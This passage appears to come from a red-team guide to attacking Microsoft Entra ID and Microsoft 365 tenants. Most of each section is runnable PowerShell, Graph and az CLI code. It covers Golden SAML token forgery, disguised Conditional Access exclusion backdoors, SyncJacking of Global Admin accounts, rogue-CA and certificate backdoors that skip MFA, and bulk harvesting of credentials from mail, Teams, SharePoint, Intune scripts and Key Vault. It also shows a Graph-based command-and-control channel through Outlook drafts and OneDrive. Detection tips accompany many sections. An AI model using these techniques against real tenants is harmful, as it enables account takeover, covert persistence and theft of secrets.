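        Write-Output "$($a.displayName) | $($f.issuer) | $($f.subject) $(if ($loose) { '<-- LOOSE' })"
    }
}
```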
Golden SAML
Requires: local admin on the ADFS server.
If your target uses AD FS for SSO and you can extract the token signing certificate, you can forge SAML tokens for any user -- including Global Admins -- without their password or MFA. This is the cloud equivalent of a golden ticket, popularized by the SolarWinds breach. If you have the signing key, you are the federation server.
I didn't test this one (the test tenant uses managed auth, not ADFS). AADInternals commands for reference (untested):
$saml = New-AADIntSAMLToken -ImmutableId "<base64-encoded-guid>" -Issuer "http://adfs.contoso.com/adfs/services/trust" -PfxFileName ".\signing_cert.pfx"
$tokens = Get-AADIntOAuthInfoUsingSAML -SAMLToken $saml -Resource "https://graph.microsoft.com"
OPSEC: Silent. Forged SAML tokens don't generate authentication events in Entra because the trust chain starts at the federation server, which you control.
Detection: Extremely difficult. Monitor for ADFS token signing certificate exports (Event ID 1007, 1008). Microsoft Defender for Identity can flag suspicious ADFS activity.
Conditional Access exclusion backdoors
Requires: Conditional Access Administrator role.
If you can modify Conditional Access policies, you can add exclusions for a group or account you control. Exclude your account from the "Require MFA" policy, the "Block legacy auth" policy, whatever you need. As long as you're subtle about it, this can persist for months.
The sneakier version: create a new security group, add your account to it, and add that group to the exclusion list of existing CA policies. Admins reviewing CA policies see a group name that sounds legitimate ("CA-BreakGlass-Accounts" or "Emergency-Access-Group") and don't investigate further.
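A sketch of that exclusion-group variant through Graph, assuming Policy.ReadWrite.ConditionalAccess and Group.ReadWrite.All. The PATCH body here is a minimal illustration; in practice you may need to send back the policy's full users object rather than just the new exclusion:

```powershell
# Create a plausibly named security group and add your account to it
$grp = Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/groups" -Body (@{
    displayName = "CA-BreakGlass-Accounts"; mailEnabled = $false
    mailNickname = "ca-breakglass"; securityEnabled = $true
} | ConvertTo-Json) -ContentType "application/json"
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/groups/$($grp.id)/members/`$ref" `
    -Body (@{ "@odata.id" = "https://graph.microsoft.com/v1.0/users/{your-user-id}" } | ConvertTo-Json) -ContentType "application/json"

# Slip the group into an existing policy's exclusions ("Update conditional access policy" in the audit log)
Invoke-MgGraphRequest -Method PATCH -Uri "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies/{policy-id}" -Body (@{
    conditions = @{ users = @{ excludeGroups = @($grp.id) } }
} | ConvertTo-Json -Depth 5) -ContentType "application/json"
```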
OPSEC: Moderate. The Entra audit log captures every CA policy change. Any org that alerts on CA policy modifications will catch this, but many don't.
Detection: "Update conditional access policy" in the Entra audit log. This should always trigger an alert. Also monitor "Add group" and "Add member to group" for newly created exclusion groups.
Azure AD Connect abuse
Requires: local admin on the Azure AD Connect server.
If the tenant uses Azure AD Connect (now Entra Connect) for hybrid identity, the sync account (usually MSOL_[hex] or AAD_[hex]) has extensive permissions in both AD and Entra. In AD, it typically has "Replicate Directory Changes" which means it can DCSync. In Entra, it has directory synchronization permissions.
If you compromise the server running AD Connect, you can extract the sync account credentials from the local database:
# Must be run on the AD Connect server as local admin
Get-AADIntSyncCredentials
That gives you the plaintext username and password for both the AD service account and the Entra connector account. From there, you can DCSync the domain (extract all password hashes from AD) or authenticate to Entra as the sync account and modify directory objects.
I check for the AD Connect server at every engagement. You can identify it by querying for the MSOL_ or AAD_ service accounts, or by checking Entra Connect Health in the portal. It's almost always a single server, sometimes not even domain-joined properly, running with local admin credentials that haven't been rotated since the initial setup. It's a high-value target that's often poorly protected.
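The recon is quick from any domain-joined host. The MSOL_ account's description field conveniently records which server AD Connect was installed on (RSAT AD module assumed):

```powershell
# The sync account gives away the AD Connect server
Get-ADUser -Filter 'Name -like "MSOL_*"' -Properties Description |
    Select-Object Name, Description
# Description reads like: "Account created by Microsoft Azure Active Directory Connect
# with installation identifier ... running on computer AADCONNECT01 ..."
```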
Detection: Sign-in logs show the MSOL_ or AAD_ sync account authenticating from an unexpected source. Monitor Entra sign-ins for the sync service account and alert on any sign-in that doesn't originate from the AD Connect server's known IP.
SyncJacking and Cloud Sync abuse
AD Connect abuse goes deeper than credential extraction. SyncJacking exploits the hard match mechanism that Entra uses to link on-prem AD accounts to cloud identities. The actual attack chain works like this: you query the target's objectGUID from AD, create a new attacker-controlled account and set its ImmutableId to that same GUID (base64-encoded), then delete or disable the original account. When the next sync cycle runs, Entra performs a hard match on the objectGUID and links your new on-prem account to the target's cloud identity. Password gets overwritten. You now authenticate as them. This works against both Entra Connect and the newer Cloud Sync agent, and it can target any synced account including Global Admins.
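A sketch of that chain with the RSAT AD module. Account names are illustrative, and it assumes the tenant's source anchor is objectGUID / mS-DS-ConsistencyGuid (the common default):

```powershell
# Grab the victim's anchor
$victim = Get-ADUser -Identity "victim.admin" -Properties objectGUID
$anchor = $victim.ObjectGUID.ToByteArray()
[Convert]::ToBase64String($anchor)   # this is the ImmutableId Entra will match on

# Create the attacker account and stamp the stolen anchor onto it
New-ADUser -Name "svc-patching" -SamAccountName "svc-patching" -Enabled $true `
    -AccountPassword (ConvertTo-SecureString "AttackerChosen1!" -AsPlainText -Force)
Set-ADUser -Identity "svc-patching" -Replace @{ "mS-DS-ConsistencyGuid" = $anchor }

# Remove the original from sync scope; the next cycle hard-matches your account to the cloud identity
Disable-ADAccount -Identity "victim.admin"
```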
Cloud Sync deserves a separate callout because it changes the attack surface in ways defenders don't expect. Unlike the legacy Connect server (single instance, staging mode available, SQL backend you can query), Cloud Sync runs as a lightweight provisioning agent - and orgs can deploy multiple agents for redundancy. Each agent authenticates to Entra with its own service principal and gMSA. The practical impact: there isn't one sync server to find and compromise, there are potentially several, and each one has the same hard match capability.

Worse, Cloud Sync has no staging mode, so there's no safe way for defenders to test sync rule changes before they go live. For an attacker, this means your SyncJack takes effect on the next sync cycle with no preview step that might tip off an admin.

The reconnaissance step changes too - instead of hunting for the single server running the "ADSync" service, you're looking for machines with the "AADConnectProvisioningAgent" service, which is often installed on existing domain controllers rather than a dedicated server. Run Get-ADComputer -Filter * -Properties servicePrincipalName | Where-Object { $_.servicePrincipalName -match 'provisioning' } to find them.
The first step in any engagement is finding which synced accounts are worth targeting:
$roleAssignments = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments?`$expand=principal").value
$roleAssignments | ForEach-Object {
$user = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/$($_.principalId)?`$select=displayName,onPremisesSyncEnabled,userPrincipalName" -ErrorAction SilentlyContinue
if ($user.onPremisesSyncEnabled -eq $true) {
[PSCustomObject]@{ UPN = $user.userPrincipalName; RoleId = $_.roleDefinitionId }
}
}
Any synced account holding Global Admin, Privileged Role Administrator, or Authentication Policy Administrator is a prime target. Service accounts are especially attractive because they almost never have MFA enrolled.
Detection-wise, Entra audit logs record hard match events under the "Azure AD Connect" service with an activity type of "Hard match user." When a hard match fires on an account that already existed and had active sign-ins, that should be an immediate alert. Many orgs don't have that alert configured. Microsoft has announced enforcement of hard match validation starting June 1, 2026. Until then, the only thing stopping this attack is MFA on the targeted account. After June 2026, Entra will validate that the on-prem account actually matches before completing the hard match. But that's a future fix for a current problem.
While you're in the certificate neighborhood: certificate-based authentication (CBA) has its own abuse path. The attack chain requires Global Admin or Authentication Policy Administrator. You generate a self-signed root CA, upload it to the tenant's trusted certificate authorities via Graph API, issue a client certificate for your target user from that CA, and then modify the CBA authentication policy to trust your CA. The result: you authenticate as any user with a forged certificate, no MFA challenge, no password needed.
$orgId = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/organization").value[0].id
$certB64 = [Convert]::ToBase64String(([System.Security.Cryptography.X509Certificates.X509Certificate2]::new(".\rogueca.cer")).RawData)
$body = @{
certificateAuthorities = @(@{
isRootAuthority = $true
certificate = $certB64
})
} | ConvertTo-Json -Depth 5
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/organization/$orgId/certificateBasedAuthConfiguration" -Body $body -ContentType "application/json"
Once the CA is trusted, you issue a client cert with the target user's UPN in the Subject Alternative Name, then authenticate with it. EntraPassTheCert automates the cert-based authentication and lateral movement piece. CBA is supposed to be the "phishing-resistant" option, but if the trust anchors aren't locked down, it becomes the persistence mechanism instead.
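Issuing the forged client cert can be sketched with New-SelfSignedCertificate, assuming $rogueCa is the rogue CA cert (with private key) sitting in your local store; the UPN in the Subject Alternative Name is what Entra maps the cert against:

```powershell
# Client cert chained to the rogue CA, victim's UPN in the SAN
$userCert = New-SelfSignedCertificate -Subject "CN=victim.admin" -Signer $rogueCa `
    -TextExtension @("2.5.29.17={text}upn=victim.admin@contoso.com") `
    -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable

# Export for use with EntraPassTheCert or any client that speaks CBA
Export-PfxCertificate -Cert $userCert -FilePath .\victim.pfx `
    -Password (ConvertTo-SecureString "pfx-pass" -AsPlainText -Force)
```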
The cert-based backdoor works too. Here's the sequence:
$cert = New-SelfSignedCertificate -Subject "CN=BackdoorCert" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -NotAfter (Get-Date).AddYears(2)
# Attach the public key to the app registration ($app from a prior Get-MgApplication), then create its service principal
Update-MgApplication -ApplicationId $app.Id -KeyCredentials @(@{ type = "AsymmetricX509Cert"; usage = "Verify"; key = $cert.RawData })
New-MgServicePrincipal -AppId $app.AppId | Out-Null
# Authenticate with the certificate -- client credentials flow, no user involved
Connect-MgGraph -ClientId $app.AppId -TenantId $tenantId -CertificateThumbprint $cert.Thumbprint
# Result:
Welcome to Microsoft Graph!
Connected via ClientCredential to tenant contoso.onmicrosoft.com
No password, no MFA, no interactive login. Just the cert.
Detection: "Update organization" audit log entry when trusted certificate authorities are modified. "Update authentication method policy" when CBA policy changes. Any modification to the tenant's trusted CA list should be an immediate alert.
That covers persistence. Even if the original account gets burned, you've got independent paths back in. But Conditional Access is probably still getting in your way for some of these.
Conditional Access bypass
CA policies are the locks on the doors. You've got persistence, but some resources and actions might still be gated behind policies that require specific device states, network locations, or authentication strengths. You need to find which doors are unlocked or have broken locks. CA is the primary security control in Entra. If you can bypass it, most of the other defenses fall apart. I'm dedicating a separate section to this because it comes up in almost every assessment.
Legacy authentication
Requires: valid credentials. Tests whether legacy protocols bypass MFA.
Microsoft has been killing basic auth for years. Exchange Online basic auth for most protocols (ActiveSync, POP, IMAP, EWS) was disabled in October 2022. SMTP AUTH has been the last holdout. The original plan was to kill it by April 2026, but that timeline slipped. Current plan is default disable by December 2026, with full removal sometime in H2 2027. As of right now, many tenants still have it enabled (check under Exchange Online settings). The window is closing but it's not closed.
If a CA policy blocks legacy auth but the policy doesn't apply to all cloud apps, there might be apps that still accept it. Test with specific protocol endpoints:
$cred = Get-Credential
Send-MailMessage -SmtpServer "smtp.office365.com" -Port 587 -UseSsl -Credential $cred -From "user@contoso.com" -To "test@contoso.com" -Subject "test" -Body "test"
(Yes, Send-MailMessage is deprecated too. Use it for testing, not production.)
Detection: Sign-in logs show "Legacy Authentication" as the client app type. Filter for legacy auth protocols (IMAP, POP3, SMTP, ActiveSync) and alert on any successful authentication via these methods.
Device compliance gaps
Requires: access to an Entra-joined compliant device (to extract PRT or device cert), or a device that isn't enrolled in Intune at all.
First, figure out if compliance is actually enforced. Pull the CA policies and check which ones have device compliance as a grant control:
$policies = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies"
$policies.value | Where-Object { $_.grantControls.builtInControls -contains "compliantDevice" } |
Select-Object displayName, state, @{N="Apps";E={ $_.conditions.applications.includeApplications }}
If policies require compliance but only target "All cloud apps," look for exclusions. There are almost always excluded apps or user groups. Those are your way in. More importantly, device compliance only works for devices enrolled in Intune. BYOD machines, Linux workstations, personal macOS devices: if they aren't enrolled, compliance can't be evaluated, and the policy either blocks them outright or (more commonly) gets scoped so it doesn't apply to them. Check the policy conditions for included/excluded platforms. If "Linux" or "macOS" isn't in the platform filter, the policy might not trigger for those device types at all.
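Continuing from the $policies query above, this sketch pulls the exclusion surface out of each compliance-requiring policy so the gaps sit side by side:

```powershell
$policies.value | Where-Object { $_.grantControls.builtInControls -contains "compliantDevice" } |
    ForEach-Object {
        [PSCustomObject]@{
            Policy         = $_.displayName
            State          = $_.state
            ExcludedApps   = ($_.conditions.applications.excludeApplications -join ", ")
            ExcludedGroups = ($_.conditions.users.excludeGroups -join ", ")
            Platforms      = ($_.conditions.platforms.includePlatforms -join ", ")   # empty = no platform filter at all
        }
    }
```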
The other angle: if you have access to a compliant device, extract the Primary Refresh Token and replay it from a different machine. The PRT satisfies the compliance check because the token itself carries the device claim. On VMs or devices without TPM attestation, this is straightforward. On hardware with TPM-bound keys, you need to work on the compliant device directly or find a way to proxy through it. ROADtools and AADInternals both have tooling for PRT extraction and replay.
Detection: Monitor for PRT replay from non-compliant or unregistered devices by filtering sign-in logs where deviceDetail.isCompliant is false yet a Conditional Access policy requiring compliance did not block the request. Alert on token usage originating from devices that do not appear in Intune's managed device inventory, which indicates an unregistered or BYOD device satisfying the compliance claim via a replayed PRT. Cross-reference the deviceId in the sign-in event against registered device objects in Entra; a mismatch or missing device record is a strong indicator of token replay.
Trusted location abuse
Requires: valid credentials plus network access from a trusted IP range, or a VPN endpoint in the right country.
Start by enumerating what the tenant considers "trusted." Named locations are readable through Graph if you have Policy.Read.All or equivalent:
$locations = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/identity/conditionalAccess/namedLocations"
$locations.value | ForEach-Object {
Write-Output "$($_.displayName) | Trusted: $($_.isTrusted) | Type: $($_.'@odata.type')"
if ($_.ipRanges) { $_.ipRanges | ForEach-Object { Write-Output " Range: $($_.cidrAddress)" } }
if ($_.countriesAndRegions) { Write-Output " Countries: $($_.countriesAndRegions -join ', ')" }
}
You'll see two types. IP-based locations define CIDR ranges (corporate office egress IPs, VPN concentrators). Country-based locations just check the geo-IP of the source address. The bypass depends on which type you're dealing with.

For country-based locations, route through a commercial VPN endpoint in the approved country. Entra resolves your source IP against a geo-IP database, and commercial VPN providers work fine for this.

For IP-based locations, you need to actually originate traffic from that range. That means either pivoting through a compromised on-prem host that egresses through the trusted IP, or getting onto the corporate VPN with stolen credentials. If VPN access itself doesn't require MFA (common in orgs that only enforce MFA through CA policies on cloud apps), you can authenticate to the VPN with just a password, land on the trusted network, and then hit Entra resources with MFA skipped.
The real payoff: many orgs set CA policies to "skip MFA from trusted locations" as a usability tradeoff. Once you're originating from a trusted range, you can password spray without MFA blocking you, authenticate to any cloud app without a second factor, and pivot freely between services. Test whether the trusted location exclusion applies to all CA policies or just some. If even one policy skips MFA for trusted locations, that's your entry point.
Detection: Monitor sign-in logs for authentications originating from known commercial VPN provider egress IP ranges, especially where the sign-in satisfies a trusted location condition. Alert on sign-ins that pass location trust but fail device compliance or have no device claim, as this combination suggests an attacker routing through a trusted network without a managed device. Flag impossible travel patterns between trusted locations (e.g., a user authenticating from two different corporate office egress IPs in different cities within minutes). Review named location changes in the directory audit log ("Update named location") for unauthorized additions to trusted IP ranges.
Token lifetime and CAE
Requires: a stolen access or refresh token.
Access tokens are typically valid for 60-90 minutes. Refresh tokens can last much longer (up to 90 days for some configurations). If you steal a refresh token, you can keep generating new access tokens long after the user changes their password, unless Continuous Access Evaluation (CAE) is enabled.
CAE only works with apps that actually support it: Exchange Online, SharePoint Online, Teams, and Microsoft Graph (but only when you request CAE-capable scopes like Mail.Read or Files.ReadWrite). If you're calling Graph with something like Directory.Read.All through a custom app registration, CAE probably isn't protecting that token. Same goes for Azure Resource Manager, third-party SAML apps, and anything using ROPC or device code flow tokens outside the supported list.
There are two flavors. Default CAE covers the obvious stuff: password changes, user disabled, revoked refresh tokens. Microsoft pushes critical events to the resource provider and tokens get killed within minutes instead of waiting for expiry. Strict location enforcement is the upgrade. It hooks into Conditional Access location policies and re-evaluates the IP on every single request. So if a token was issued on the corporate network and you replay it from your C2 box, strict enforcement catches that. Default CAE does not. Most orgs only have default, if they have CAE at all.
Practical test: grab a token (roadtx, TokenTacticsV2, browser cookie extraction, whatever). Hit a CAE-enabled endpoint like https://graph.microsoft.com/v1.0/me/messages and confirm it works. Now change the user's password or disable the account. Try the same request again. If CAE is active, you should get a 401 with a claims challenge within a few minutes. Then hit a non-CAE endpoint (or use the token with a tool that doesn't handle claims challenges) and watch it keep working until the token naturally expires. That gap is your window.
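The replay test can be scripted. This sketch (Windows PowerShell; PowerShell 7 surfaces the response object differently) replays a bearer token and looks for the CAE claims challenge in the WWW-Authenticate header:

```powershell
$headers = @{ Authorization = "Bearer $stolenToken" }   # $stolenToken from roadtx/TokenTacticsV2
try {
    Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/me/messages?`$top=1" -Headers $headers | Out-Null
    Write-Output "token still works"
} catch {
    $www = $_.Exception.Response.Headers["WWW-Authenticate"]
    if ($www -match "claims=") { Write-Output "CAE claims challenge -- token revoked" }
    else { Write-Output "rejected for another reason: $($_.Exception.Message)" }
}
```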
Check which users have long-lived sessions:
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/auditLogs/signIns?`$filter=createdDateTime ge 2024-01-01T00:00:00Z&`$orderby=createdDateTime desc&`$top=50"
Once you've figured out where the CA gaps are, the rest is just execution. Graph API is where the real post-exploitation happens.
Graph API abuse: post-exploitation
You have access, persistence, and you've dealt with the CA controls. Now you actually do something with it. Graph API is your Swiss army knife for post-exploitation. Everything in Microsoft 365 is accessible through it: email, files, Teams messages, calendar, contacts, Intune policies. This is where the engagement goes from "we proved we could get admin" to "here's what an attacker would actually steal."
Reading mailboxes
With Mail.Read or Mail.ReadWrite (delegated or application), you can read anyone's email. The first thing I search for: passwords, credentials, API keys.
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/{user-id}/messages?`$search=%22password%22&`$select=subject,from,receivedDateTime&`$top=25"
# Search for common credential patterns
foreach ($term in @("password", "credential", "secret", "API key", "connection string")) {
$enc = [uri]::EscapeDataString($term)   # terms with spaces must be URL-encoded
$results = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/{user-id}/messages?`$search=%22$enc%22&`$top=10"
Write-Output "$term`: $($results.value.Count) results"
}
You'd be surprised how often people email passwords to themselves or receive credentials in plaintext from helpdesk systems. The "New Employee" onboarding emails are goldmines.
Also check for inbox rules. Attackers (and you, if you're persisting) love creating inbox rules that forward copies of emails to external addresses or move security alerts to deleted items:
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/{user-id}/mailFolders/inbox/messageRules"
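Triage the rules you get back for the two patterns that matter: external forwards and alert suppression. A sketch (the @contoso.com check is a stand-in for the target's real accepted domains):

```powershell
$rules = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/{user-id}/mailFolders/inbox/messageRules").value
foreach ($r in $rules) {
    $targets = @($r.actions.forwardTo) + @($r.actions.redirectTo) |
        ForEach-Object { $_.emailAddress.address } | Where-Object { $_ }
    $external = $targets | Where-Object { $_ -notlike "*@contoso.com" }
    if ($external) { Write-Output "SUSPECT [$($r.displayName)]: forwards to $($external -join ', ')" }
    if ($r.actions.delete -or $r.actions.moveToFolder) { Write-Output "SUSPECT [$($r.displayName)]: deletes/moves matching mail" }
}
```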
OPSEC: Moderate. Mailbox access logs exist and data loss prevention policies may trigger on keyword searches. Unified audit log records MailItemsAccessed events if advanced auditing is enabled.
Detection: Unified audit log MailItemsAccessed events (requires E5 or advanced auditing). "New-InboxRule" or "Set-InboxRule" in Exchange audit log for rule creation. Alert on inbox rules that forward to external domains or delete security notifications.
Teams message harvesting
Requires: ChannelMessage.Read.All or Team.ReadBasic.All permission, or delegated access as a team member.
Teams messages often contain more sensitive info than email because people treat it like a casual conversation. Shared credentials, internal project details, infrastructure diagrams, that kind of thing.
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/me/joinedTeams"
# Get channels in a specific team
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/teams/{team-id}/channels"
# Read messages from a channel
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/teams/{team-id}/channels/{channel-id}/messages?`$top=50"
The beta endpoint gives you more: reactions, replies, attachments. Worth using if you need the full picture.
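Scaling that up: a sketch that sweeps every channel you can read for credential-looking strings. The regex is a crude starting point, tune it per engagement:

```powershell
$teams = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/me/joinedTeams").value
foreach ($t in $teams) {
    $channels = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/teams/$($t.id)/channels").value
    foreach ($c in $channels) {
        $msgs = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/teams/$($t.id)/channels/$($c.id)/messages?`$top=50").value
        # Flag messages whose HTML body matches credential-ish patterns
        $hits = $msgs | Where-Object { $_.body.content -match 'password|passwd|secret|api[_ ]?key' }
        foreach ($h in $hits) {
            $snippet = $h.body.content.Substring(0, [Math]::Min(120, $h.body.content.Length))
            Write-Output "[$($t.displayName)/$($c.displayName)] $($h.from.user.displayName): $snippet"
        }
    }
}
```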
Detection: Microsoft Graph activity logs (if enabled) show Teams message read operations. Bulk channel message reads from a single user or app are anomalous. Defender for Cloud Apps can flag unusual Teams data access patterns.
SharePoint and OneDrive
Requires: Files.Read.All or Sites.Read.All permission.
SharePoint sites and OneDrive are where the documents live. If you have Files.Read.All or Sites.Read.All, you can enumerate everything.
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/sites?search=contoso&`$select=displayName,webUrl"
# List files in a site's default document library
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/sites/{site-id}/drive/root/children"
# Search across all SharePoint for interesting files
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/search/query" -Body (@{
requests = @(@{
entityTypes = @("driveItem")
query = @{ queryString = "password OR credential OR secret" }
from = 0
size = 25
})
} | ConvertTo-Json -Depth 5)
I always search for filenames like "passwords.xlsx", "credentials.txt", "config.json", and anything in a folder called "IT" or "Infrastructure." The search query above will return matching results if they exist in indexed SharePoint content.
Detection: SharePoint unified audit log FileAccessed and FileDownloaded events. Bulk file downloads or search queries across multiple sites from a single account are anomalous. Defender for Cloud Apps flags mass download activity.
Intune policy access
Requires: DeviceManagementConfiguration.Read.All or Intune Administrator role.
If you have DeviceManagementConfiguration.Read.All, you can read Intune device configuration profiles. These sometimes contain Wi-Fi passwords, VPN configurations, certificate settings, and scripts that get deployed to devices.
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/deviceManagement/deviceConfigurations"
# List PowerShell scripts deployed via Intune
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts"
The scripts endpoint is beta-only, which is annoying but it works. Some of those scripts have hardcoded credentials in them. But just listing configs and scripts isn't the point. The point is what you find inside them.
Extract Wi-Fi passwords from configuration profiles. Wi-Fi profiles pushed through Intune often contain pre-shared keys in plaintext (or base64, which is the same thing). Pull down every Wi-Fi configuration profile and check the XML payloads. Corporate WPA2-Enterprise profiles will have certificate references, but plenty of orgs also push guest network or site-specific PSK profiles through Intune. Those passwords are sitting right there in the config.
Find VPN configurations for network access. VPN profiles contain server addresses, authentication methods, and sometimes embedded credentials or certificate references. Even without the credentials in the profile itself, knowing the VPN server address, the authentication type, and the split tunnel configuration tells you exactly how to get onto the internal network. If the VPN profile uses certificate auth and you can pull the cert from a managed device (which you can, if you also have Intune admin), you've got network access that doesn't require a username or password at all.
Check scripts for hardcoded credentials. This is the big one. Intune deployment scripts are written by IT admins who are often in a hurry and not thinking about threat models. I've seen service account passwords, API keys, SAS tokens, and database connection strings hardcoded directly in scripts that get pushed to every device. Pull every script from the deviceManagementScripts endpoint, base64-decode the scriptContent property, and grep for strings like "password", "secret", "key", and "connectionstring". You'll be surprised how often this pays off.
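That decode-and-grep loop, sketched. I'm assuming the list response needs a per-script follow-up GET to populate scriptContent; if your tenant returns it inline, skip that call:

```powershell
$scripts = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts").value
foreach ($s in $scripts) {
    # Fetch the individual script to get its base64 scriptContent
    $full = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts/$($s.id)"
    $content = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($full.scriptContent))
    $hits = $content -split "`n" | Select-String -Pattern 'password|secret|apikey|connectionstring'
    if ($hits) {
        Write-Output "[$($s.displayName)]"
        $hits | ForEach-Object { Write-Output "  $_" }
    }
}
```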
One gotcha: if you're using Connect-MgGraph (the Graph PowerShell SDK), the underlying client app doesn't have the DeviceManagementConfiguration.Read.All scope registered. You'll get AADSTS650053: scope doesn't exist on the resource. Use az account get-access-token instead, or register your own app. The az CLI client has the scope; the Graph SDK client doesn't.
Detection: Intune audit logs show read access to device configuration profiles and scripts. Unusual access to the deviceManagementScripts endpoint from non-Intune admin accounts is suspicious.
Key Vault secrets
Requires: Key Vault Reader or Contributor RBAC role, or a vault access policy granting Get/List on secrets.
Key Vault is where orgs are supposed to put the secrets they shouldn't hardcode. Connection strings, API keys, storage account keys, service account passwords, certificates. If you've landed a service principal or user with Key Vault access, this is one of the highest-value targets in the subscription. Enumerate every vault, list what's inside, and pull the values.
az keyvault list --query "[].{name:name, resourceGroup:resourceGroup}" -o table
# List all secrets in a vault
az keyvault secret list --vault-name TargetVault --query "[].{name:name, enabled:attributes.enabled}" -o table
# Read a secret value
az keyvault secret show --vault-name TargetVault --name SqlConnectionString --query value -o tsv
One thing that trips people up: Key Vault has two authorization models. Newer vaults use Azure RBAC (roles like Key Vault Secrets User). Older vaults use the legacy vault access policies, which are configured per-vault and don't show up in normal RBAC queries. If az keyvault secret list returns a 403, check whether the vault uses access policies instead of RBAC. You can see this with az keyvault show --name X --query properties.enableRbacAuthorization. If it returns false, the vault uses access policies and you need to be listed there explicitly.
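To sweep everything at once, wrap the az calls in a loop. This sketch just walks every vault you can list and tries the secrets; expect 403s (written to stderr by az) on vaults where your principal isn't authorized under either model:

```powershell
foreach ($vault in (az keyvault list --query "[].name" -o tsv)) {
    foreach ($name in (az keyvault secret list --vault-name $vault --query "[].name" -o tsv)) {
        $value = az keyvault secret show --vault-name $vault --name $name --query value -o tsv
        Write-Output "$vault / $name = $value"
    }
}
```

Every one of those reads lands in the vault's diagnostic log if it's configured, so on a live engagement you may want to be selective rather than dumping everything.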
OPSEC: Key Vault has its own diagnostic logging. If diagnostic settings are configured to send to a Log Analytics workspace, every secret read is logged with the caller's identity. Not all orgs have this enabled, but the mature ones do.
Detection: Key Vault diagnostic logs (AuditEvent category) record SecretGet and SecretList operations. Alert on secret access from unexpected principals or IP addresses. Azure Defender for Key Vault (if enabled) flags anomalous access patterns automatically.
Graph API as a C2 channel
Requires: Mail.ReadWrite (for Outlook drafts) or Files.ReadWrite (for OneDrive).
This is a trend worth paying attention to. Attackers are using Graph API as a command-and-control channel because the traffic looks identical to normal Office 365 usage. FINALDRAFT malware (documented in early 2025) uses Outlook Drafts as its C2 medium: commands go into draft emails, responses come back as drafts, nothing ever gets sent. The implant has 37 command handlers and communicates entirely through Graph API calls to the mailbox. From a network monitoring perspective, it's HTTPS traffic to graph.microsoft.com, same as every other Office 365 client in the environment.
The conceptual pattern is simple. The operator writes a command to a draft, the implant reads it and deletes it, then writes the output to a new draft:
$cmdBody = @{
subject = "task"
body = @{ contentType = "Text"; content = "whoami /all" }
isDraft = $true
} | ConvertTo-Json
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/me/messages" -Body $cmdBody -ContentType "application/json"
# Implant: poll drafts, read command, delete it
$drafts = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/me/mailFolders/drafts/messages?`$filter=subject eq 'task'").value
foreach ($msg in $drafts) {
$cmd = $msg.body.content
Invoke-MgGraphRequest -Method DELETE -Uri "https://graph.microsoft.com/v1.0/me/messages/$($msg.id)"
# Execute and write result back as a new draft...
}
Both C2 patterns work. Here's the draft approach in action:
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/me/messages" -Body $cmdBody -ContentType "application/json"
# Response:
id : AAMkADQ0MTg4NTEtYjA...
subject : task
bodyPreview : whoami /all
isDraft : True
# Verified it appeared in drafts:
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/me/mailFolders/drafts/messages?`$filter=subject eq 'task'"
# value.Count: 1
# Deleted it:
Invoke-MgGraphRequest -Method DELETE -Uri "https://graph.microsoft.com/v1.0/me/messages/AAMkADQ0MTg4NTEtYjA..."
# 204 No Content - gone.
Standard Mail.ReadWrite permission. The OneDrive variant works the same way, just with files instead of drafts:
Invoke-MgGraphRequest -Method PUT -Uri "https://graph.microsoft.com/v1.0/me/drive/root:/c2-cmd.txt:/content" -Body "whoami /all" -ContentType "text/plain"
# Response:
name : c2-cmd.txt
size : 13
id : 00000000-0000-0000-0000-000000000000
# Implant reads the file:
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/me/drive/root:/c2-cmd.txt:/content"
# Returns: whoami /all
# Deleted it:
Invoke-MgGraphRequest -Method DELETE -Uri "https://graph.microsoft.com/v1.0/me/drive/items/00000000-0000-0000-0000-000000000000"
# 204 No Content - gone.
Files.ReadWrite only. Neither operation triggered an alert in the test tenant.
